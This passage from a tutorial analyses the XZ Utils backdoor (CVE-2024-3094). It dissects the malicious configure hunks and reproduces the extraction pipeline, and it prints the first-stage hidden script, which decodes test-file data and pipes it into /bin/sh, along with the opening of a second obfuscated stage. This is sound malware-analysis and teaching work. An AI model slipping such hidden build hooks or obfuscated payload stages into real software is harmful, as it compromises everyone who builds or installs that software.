grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null
```
:::info
**Note:**
The <code>`_command_`</code> portion of the command is in [the aforementioned Bash scripting language's _command substitution_ syntax](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html), albeit in the deprecated backtick form of the modern `$(command)` syntax.
:::
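As a quick sanity check that the two substitution forms behave identically (the `hello` literal is arbitrary):

```shell
# Backtick (deprecated) and $() command substitution produce the
# same value
legacy=`echo hello`
modern=$(echo hello)
[ "$legacy" = "$modern" ] && echo 'both forms are equivalent'
# → both forms are equivalent
```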
We can expand the command as the following commands:
```bash
# Seems to be expanded to the source tree directory's path
srcdir=xz-5.6.1
grep_opts=(
# -a: Process a binary file as if it were text
--text
# -E: Specify the search pattern is an extended regular
# expression(ERE)
--extended-regexp
# -r: Read and process all files in the specified directory
# recursively
--recursive
# -l: Suppress normal output, only print the name of the input
# file that have successfully matched the specified search
# pattern
--files-with-matches
# -s: Suppress error messages regarding nonexistent or unreadable
# files
--no-messages
)
grep "${grep_opts[@]}" "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null
```
The `#{4}[[:alnum:]]{5}#{4}$` (POSIX) extended regular expression matches any string that contains the following elements in the following
order, anchored at the end of a line(`$`):
1. 4 consecutive pound signs(`#{4}`)
2. 5 consecutive characters from the set of alphabet letters and digits(`[[:alnum:]]{5}`)
3. 4 consecutive pound signs(`#{4}`)
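You can sanity-check the pattern against a throwaway directory (the grep-demo directory and its file names are made up):

```shell
# One file whose line matches the marker pattern, one that doesn't
mkdir -p grep-demo
printf '####Hello####\n' > grep-demo/matching.bin
printf '###Hello###\n' > grep-demo/not-matching.bin

# Only the file with 4 pounds + 5 alphanumerics + 4 pounds at the end
# of a line is reported
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" grep-demo/
# → grep-demo/matching.bin
```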
Running the command will reveal the assigned variable value to be:
```output
xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
This is already alarming, as a software testing data file should have
no business with the software build itself.
The `if` block at lines 18687~18691 checks whether the
`gl_am_configmake` variable is a non-null string(i.e. whether the grep
command managed to match the special search pattern in the software
source tree) and assigns the `HAVE_PKG_CONFIGMAKE` variable to 1 when
it is.
This is likely to avoid the build configuration program erroring out
when the maliciously crafted test data does not exist in the source
tree for any reason(such as the file being removed at a future time),
which might attract people's attention.
:::info
**Note:**
People who are familiar with the build configuration programs generated by GNU Autoconf may notice that the `if` condition uses a test feature(`-n`) that is not normally used in a build configuration program due to shell compatibility concerns(we will see the proper way to do this in the following sections). This increases the suspiciousness of the change.
:::
Line 18695 assigns the `tr "\t \-_" " \t_\-"` string to the
`gl_path_map` variable, which seems to be a camouflaged `tr` command
that translates data using the following rules:
* Replace each tab character(`\t`) with a space character.
* Replace each space character(` `) with a tab character.
* Replace each hyphen-minus character(`\-`) with an underscore character.
* Replace each underscore character with a hyphen-minus character.
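The character swap can be observed directly on a made-up sample string:

```shell
# Hyphen-minus and underscore characters trade places
# (as do tabs and spaces)
printf 'bad-3-corrupt_lzma2\n' | tr "\t \-_" " \t_\-"
# → bad_3_corrupt-lzma2
```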
Then, for the following difference hunk:
```diff
@@ -19875,6 +19883,7 @@
gl_final_localedir="$localedir"
+ gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
case "$build_os" in
cygwin*)
case "$host_os" in
```
The *wrongly indented* line 19886:
```bash
gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
```
assigns the `gl_localedir_prefix` variable to the output of the following command:
```bash
echo $gl_am_configmake | sed "s/.*\.//g"
```
, which, after parameter expansion and quote removal, becomes:
```bash
echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"
```
This command essentially calls the `sed` plaintext data manipulation
utility to do a search & replace:
* Search all occurrences that matches the `.*\.` basic regular expression.
+ The `.*` basic regular expression pattern matches _zero or more_ occurrences of the `.` RE pattern(which matches any single character).
+ The `\.` basic regular expression pattern matches a literal `.` character.
* Replace each matched occurrence with a null string(essentially removing it).
This filters the `xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz`
filename down to its `xz` filename-extension portion; as you will
notice in a later section, this is a sneaky way to smuggle in the `xz`
command call.
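The extraction can be confirmed anywhere, no source tree required:

```shell
# Everything up to and including the last dot is removed,
# leaving only the filename extension
echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"
# → xz
```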
:::info
**Note:**
The `\.` substring in the `"s/.*\.//g"` double-quoted string expands
to literal `\.` instead of `.` due to the following behaviors
documented in the Bash reference manual:
* The backslash retains its special meaning only when followed by one
of the following characters: ‘$’, ‘\`’, ‘"’, ‘\\’, or _newline_.
* Within double quotes, backslashes that are followed by one of these characters are removed. *Backslashes preceding characters without a special meaning are left unmodified.*
:::
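This behavior is easy to demonstrate by printing the double-quoted string back out:

```shell
# `.` is not one of $ ` " \ newline, so the backslash before it
# survives double-quote processing unmodified
printf '%s\n' "s/.*\.//g"
# → s/.*\.//g
```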
Let's examine the next hunk of the build configuration program, which strangely features a big chunk of blank lines:
```diff
@@ -19891,6 +19900,34 @@
if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
localedir_c_make='\"$(localedir)\"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+ else
+ gl_localedir_config=''
+ fi
...stripped...
+ ac_config_commands="$ac_config_commands build-to-host"
localedir="${gt_save_localedir}"
```
The `if` block at lines 19903~19907 checks whether the `gl_am_configmake` variable's value is a non-null string(equivalent to the `-n` option of the `test` command used in the aforementioned hunk).
:::info
**Note:**
This is what a GNU Autoconf-generated build configuration program
would normally do in order to check whether a string is not null, as
opposed to using the `-n` command-line option of the `test` builtin
command mentioned previously.
:::
When the variable's value is not a null string, it sets the `gl_localedir_config` variable to the following single-quoted string:
```bash!
sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null
```
We'll keep this string unprocessed for now until it is actually evaluated by the shell interpreter.
Line 19930 appends the ` build-to-host` string to the
`ac_config_commands` variable, which seems to define a GNU
Autoconf build configuration command that will be run at the end of
the build configuration. I'm not entirely sure what effect it has, so let's leave it alone for the moment.
For the next diff hunk:
```diff
@@ -23884,6 +23921,11 @@
enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$delay_single_quote_subst"`'
old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`'
striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`'
+gl_path_map='`$ECHO "$gl_path_map" | $SED "$delay_single_quote_subst"`'
+gl_localedir_prefix='`$ECHO "$gl_localedir_prefix" | $SED "$delay_single_quote_subst"`'
+gl_am_configmake='`$ECHO "$gl_am_configmake" | $SED "$delay_single_quote_subst"`'
+localedir_c_make='`$ECHO "$localedir_c_make" | $SED "$delay_single_quote_subst"`'
+gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
LD_RC='`$ECHO "$LD_RC" | $SED "$delay_single_quote_subst"`'
reload_flag_RC='`$ECHO "$reload_flag_RC" | $SED "$delay_single_quote_subst"`'
reload_cmds_RC='`$ECHO "$reload_cmds_RC" | $SED "$delay_single_quote_subst"`'
```
Lines 23924~23928 apply a translation to the content of the previously defined variables, using a sed expression that is defined at lines 8403~8404 as follows:
```bash
# Sed substitution to delay expansion of an escaped single quote.
delay_single_quote_subst='s/'\''/'\'\\\\\\\'\''/g'
```
After the script interpreter's [escape character interpretation](https://www.gnu.org/software/bash/manual/html_node/Escape-Character.html) and [quote removal](https://www.gnu.org/software/bash/manual/html_node/Quote-Removal.html) the actual sed expression can be determined to be:
```sed
s/'/'\\\''/g
```
According to [the `s` command section of the GNU sed manual](https://www.gnu.org/software/sed/manual/html_node/The-_0022s_0022-Command.html#The-_0022s_0022-Command), only the `\\` substring in the _replacement_ portion of the `s` sed command is treated as an escape sequence and is interpreted as a single backslash character(`\`). As a result, the sed expression searches for every occurrence of the single-quote character in each input line and replaces it with `'\\''`.
This operation appears to be GNU Autoconf working around shell interpreter quoting behaviors and is not related to the backdoor itself; we'll ignore it for now.
Now, back to the string assigned to the `gl_localedir_config` variable earlier, which seems to be a shell command pipeline that can be further expanded to:
```bash
sed \"r\n\" xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
| tr "\t \-_" " \t_\-" \
| xz -d 2>/dev/null
```
I wasn't able to figure out what the weird `sed` command does, so I simply looked it up. According to [Daniel Feldman](https://x.com/d_feldman/status/1777018755270238652), the `sed` command is essentially a disguised `cat` that simply outputs the content of the bad-3-corrupt_lzma2.xz file to the rest of the pipeline, which performs the aforementioned character translation and decompresses the result using the `xz` utility.
What does it extract to? A shell script!
```bash
####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
```
Let's ignore the multiple attempts to terminate the script when the operating system isn't Linux; in the next portion of the commands:
```bash
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
```
the script attempts to locate the root directory of the XZ Utils source tree via the `srcdir` variable set in the `config.status` GNU Autoconf build intermediate file, as the build configuration program may not be run in the root directory of the source tree in some software build scenarios(such as distribution packaging).
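The `eval`-over-`grep` trick can be reproduced with a fabricated config.status file (the srcdir value below is made up):

```shell
# Fake the single line of config.status that the script cares about
printf "srcdir='../xz-5.6.1'\n" > config.status

# grep emits the `srcdir='...'` assignment line verbatim;
# eval then executes it in the current shell
eval `grep ^srcdir= config.status`
echo "$srcdir"
# → ../xz-5.6.1
```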
In the last portion of the script commands the following commands are executed:
```bash
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval $i \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
Smells like another round of code/data obfuscation, let's divide and conquer the command pipeline.
In the first component of the command pipeline:
```bash
srcdir="xz-git"
xz_opts=(
# Decompress compressed data
--decompress
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}" "${srcdir}/tests/files/good-large_compressed.lzma"
```
the script decompresses the seemingly benign tests/files/good-large_compressed.lzma test data to the command's output.
The `i` shell variable essentially houses a _subshell_ of AND-list commands to run; after parameter expansion the pipeline becomes:
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval "((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)" \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
The `eval` command interprets the string that follows as a script. It doesn't seem to matter much on this occasion, so let's drop it for now:
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| (
(head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +939
) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
As the name indicates, the subshell markup launches another shell interpreter process as a sub-process of the current shell interpreter and runs the enclosed commands inside that process. The shell interpreter receives the output of the previous component of the command pipeline, processes it using the commands in the subshell, then writes the result to the standard output device(stdout), which is then redirected as the standard input(stdin) of the next component in the pipeline.
The subshell commands simply:
1. Drop(`>/dev/null`) the next 1,024 bytes of the data stream.
1. Output the next 2,048 bytes of the data stream.
1. Repeat steps 1 and 2 until they have been performed 16 times in total.
1. Drop(`>/dev/null`) the next 1,024 bytes of the data stream.
1. Output the next 939 bytes of the data stream.
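A two-round toy version of the same skip/keep pattern, using synthetic labeled data instead of the real test file (the sample.bin name and the 'x'/'K' labels are made up):

```shell
# Build 6 KiB of labeled data: two rounds of 1 KiB filler ('x')
# followed by 2 KiB payload ('K')
{
    head -c 1024 /dev/zero | tr '\0' 'x'
    head -c 2048 /dev/zero | tr '\0' 'K'
    head -c 1024 /dev/zero | tr '\0' 'x'
    head -c 2048 /dev/zero | tr '\0' 'K'
} > sample.bin

# Drop each filler chunk, keep each payload chunk; only 'K' bytes
# should reach the output, so deleting them leaves nothing
(
    (head -c +1024 >/dev/null) && head -c +2048 \
        && (head -c +1024 >/dev/null) && head -c +2048
) < sample.bin | tr -d 'K' | wc -c
# → 0
```

Note that the `+` prefix on `head -c` is accepted by GNU coreutils `head`, which the backdoor's script relies on.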
The next shell pipeline component:
```bash
tail_opts=(
# Output the content starting from byte 31233 (1-indexed) of the input data
--bytes +31233
)
tail "${tail_opts[@]}"
```
filters out the bytes before byte 31233(i.e. discards the first 31,232 bytes).
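The `+` offset form is easy to check on a short string:

```shell
# `tail -c +N` outputs from byte N (1-indexed) onward,
# discarding the first N-1 bytes
printf 'abcdef' | tail -c +3
# → cdef
```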
The next shell pipeline component:
```bash
tr \
"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
"\0-\377"
```
remaps the byte values of the data: each byte falling in the octal
ranges listed in the first set(`\114-\321`, `\322-\377`, `\35-\47`,
`\14-\34`, `\0-\13`, `\50-\113`, 256 values in total) is translated to
the corresponding byte of the second set(`\0-\377`), undoing a simple
substitution cipher applied to the embedded payload.
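The remap can be spot-checked one byte at a time; for instance `\114` (the letter `L`, the first byte of the first source range) should land on `\0`, the first byte of the target range:

```shell
# 'L' is octal \114, the first byte of set 1; it maps to \0, the
# first byte of set 2. od shows the resulting byte value in decimal.
printf 'L' \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
    | od -An -tu1
```

The reported byte value should be 0.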
The next shell pipeline component:
```bash
xz_opts=(
# Decompress compressed data
--decompress
# Decompresses a _raw_ LZMA1 stream
--format raw
--lzma1
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}"
```
decompresses the data by assuming it is a raw LZMA1 stream, which is a very specific decompression parameter combination.
By running the pipeline, but redirecting the output to a file instead of piping it to /bin/sh, we can retrieve the deobfuscation result:
```bash!
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| (
(head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +939
) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
> good-large_compressed.deobfuscated
```
Surprise, surprise! [Another shell script](https://pastebin.com/xvcM9V9x)!
```bash
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
...stripped...
```
This time it is again a heavily obfuscated shell script, discouraging researchers from digging deeper into the abyss.
As analysing the script requires a deep understanding of the following subjects, I have to give up here and look for answers from other people:
* AWK
* GCC
* GNU ld
* glibc
* libtool
I would suggest checking out the [research!rsc: The xz attack shell script](https://research.swtch.com/xz-script) article by [Russ Cox](https://swtch.com/~rsc/), who explains what the segments in this script (may) do.
## Credits
The following people, among others, helped during the writing of this tutorial:
* We would like to thank OooP!(supposed to be 0xlane) from the #xz-backdoor-reversing chat room for sharing [their backdoor extraction project](https://github.com/0xlane/xz-cve-2024-3094).
* We would like to thank [Sam James](mailto:sam@cmpct.info) for help on:
+ Retrieving the (supposed to be) original tainted XZ Utils release archives.
+ Determining the actual software versions the potential evil actor uses to generate the release archive.
* We would like to thank stanley.wang @ the HackMD discord for the ToC panel width workaround.
* We would like to thank Bertram(int-e) from the #tukaani IRC channel for the help on reviewing [the "determine which version of the Autotools components are actually used in the tainted release archive" section](#Determine-the-software-used-to-generate-the-build-system-files)
## References
During the writing of this tutorial, the following third-party materials were referenced:
* [Wayback Machine snapshots of the https://github.com/tukaani-project/xz/releases/download/\* URLs](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*)
Creditable snapshots of the (now inaccessible) GitHub Releases upstream release archives.
* [0xlane/xz-cve-2024-3094: XZ Backdoor Extract(Test on Ubuntu 23.10)](https://github.com/0xlane/xz-cve-2024-3094)
Provides detailed process of extracting the malware payload, by 0xlane.
* [thesamesam/xz-archive: Archive of xz releases for backdoor analysis.](https://github.com/thesamesam/xz-archive)
Provides backups of the recent XZ release archives, by [Sam James](https://github.com/thesamesam).
* [Web of trust - Wikipedia](https://en.wikipedia.org/wiki/Web_of_trust)
For providing basic info regarding the PGP web of trust model.
* [Docker security | Docker Docs](https://docs.docker.com/engine/security/#docker-daemon-attack-surface)
Explains the security implications of allowing a regular user to have access to the Docker Daemon control socket.
* [Bind mounts | Docker Docs](https://docs.docker.com/storage/bind-mounts/)
Explains how to create bind mount in the Docker container.
* [Arrays (Bash Reference Manual)](https://www.gnu.org/software/bash/manual/html_node/Arrays.html)
Explains how to use the indexed array assignment syntax of the Bash scripting language.
* [Shell Parameter Expansion (Bash Reference Manual)](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html)
Explains the parameter expansion feature of the Bash scripting language.
* [Mirrors : Ubuntu](https://launchpad.net/ubuntu/+archivemirrors)
Enumerate the list of the Ubuntu software archive mirror services.
* [ISO 3166-1 alpha-2 - Wikipedia](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)
Explains the country code that (likely) used for the country Ubuntu software archive mirror domains.
* [Pretty Good Privacy - Wikipedia](https://en.wikipedia.org/wiki/Pretty_Good_Privacy)
Explains the usage of the PGP encryption solution.
* [Networking overview | Docker Docs](https://docs.docker.com/network/#dns-services)
Explains how to specify custom DNS service settings to the guest container.
* [GNU Build System (automake)](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html)
Explains the basic concepts of the GNU Build System.
* The gpg(1) manual page
For the format and usage of the `--receive-keys` `gpg` command-line option.
* [gnupg - Error "gpg: keyserver receive failed: No name" - Stack Overflow](https://stackoverflow.com/questions/66217436/error-gpg-keyserver-receive-failed-no-name)
Explains how to do if GnuPG cannot retrieve the public key.
* [debian/patches/Use-hkps-keys.openpgp.org-as-the-default-keyserver.patch · bb14f4ece6fa97bfc51e94318660682bcbaf5c36 · Debian / gnupg2 · GitLab](https://salsa.debian.org/debian/gnupg2/-/blob/bb14f4ece6fa97bfc51e94318660682bcbaf5c36/debian/patches/Use-hkps-keys.openpgp.org-as-the-default-keyserver.patch)
Explains the default PGP keyserver choice for Debian.
* [OR Lists | Lists | Shell Commands | Shell Command Language | The Open Group Base Specifications Issue 7, 2018 edition](https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_09_03_08)
Explains the OR LIST syntax of the POSIX shell command language.
* [TZ | Other Environment Variables | Environment Variables | Base Definitions | The Open Group Base Specifications Issue 7, 2018 edition](https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap08.html#tag_08_03)
[TZ Variable (The GNU C Library)](https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html)
Explains the supported syntaxes of the TZ environment variable's value.
* [Prime meridian - Wikipedia](https://en.wikipedia.org/wiki/Prime_meridian)
Explains the concept of the Prime meridian.
* [List of time zone abbreviations - Wikipedia](https://en.wikipedia.org/wiki/List_of_time_zone_abbreviations)
Enumerates a list of popular time zone abbreviations.
* [Coordinated Universal Time - Wikipedia](https://en.wikipedia.org/wiki/Coordinated_Universal_Time)
Explains the concept of the Coordinated Universal Time(UTC).
* [GNU gettext utilities](https://www.gnu.org/software/gettext/manual/gettext.html#autopoint-Invocation)
Explains what the `autopoint` command will do.
* [Writing Autoconf Input (Autoconf)](https://www.gnu.org/savannah-checkouts/gnu/autoconf/manual/autoconf-2.72/html_node/Writing-Autoconf-Input.html)
Explains the concept of the configure.ac Autoconf input file.
* The `dpkg-divert`(1) manual page
Explains how to use the `dpkg-divert` command to rename a file installed from dpkg.
* [Detailed Description of Unified Format - Unified Format - Showing Differences in Their Context - `diff` Output Formats - GNU Diffutils manual](https://www.gnu.org/software/diffutils/manual/html_node/Detailed-Unified.html#Detailed-Description-of-Unified-Format)
Explains the unified diff format.
* [Double Quotes - Quoting - Shell Syntax - Shell Syntax - Basic Shell Features - Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Double-Quotes.html)
Explains how the double-quoted string in bash handles backslash sequences.
* [`eval` - Bourne Shell Builtins - Shell Builtin Commands - Bash Reference Manual](https://www.gnu.org/software/bash/manual/bash.html#index-eval)
Explains how the `eval` Bash builtin command works.
* [Escape Character - Quoting - Shell Syntax - Basic Shell Features - Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Escape-Character.html)
Explains how raw backslash-escaped character sequences work.
* [The "s" Command (sed, a stream editor)](https://www.gnu.org/software/sed/manual/html_node/The-_0022s_0022-Command.html)
Explains how the backslash escape sequences are interpreted in the _replacement_ text of the `s` sed command.
* [Grouping Commands - Bash Reference Manual](https://www.gnu.org/software/bash/manual/bash.html#Command-Grouping)
Explains the syntax and effect of the subshell markup.
* The head(1) manual page
Explains how the `-c` command-line option functions.
* The tail(1) manual page
Explains how the `-c` command-line option functions.
* The tr(1) manual page
Explains how the `tr` interprets the \NNN octal number sequence.
* [research!rsc: The xz attack shell script](https://research.swtch.com/xz-script)
Explains the logic of the extracted shell script from the maliciously crafted test data.
---
This work is released under Public Domain; refer to the [workspace homepage](https://hackmd.io/@cve-2024-3094/home) for more details.
This work was initially written by [林博仁(Buo-ren Lin)](https://brlin.tw); attribution will be appreciated.
<style>
#ui-toc {
/* Fix the ToC mobile interface not expandable horizontally by
* the user.
*/
resize: horizontal;
}
</style>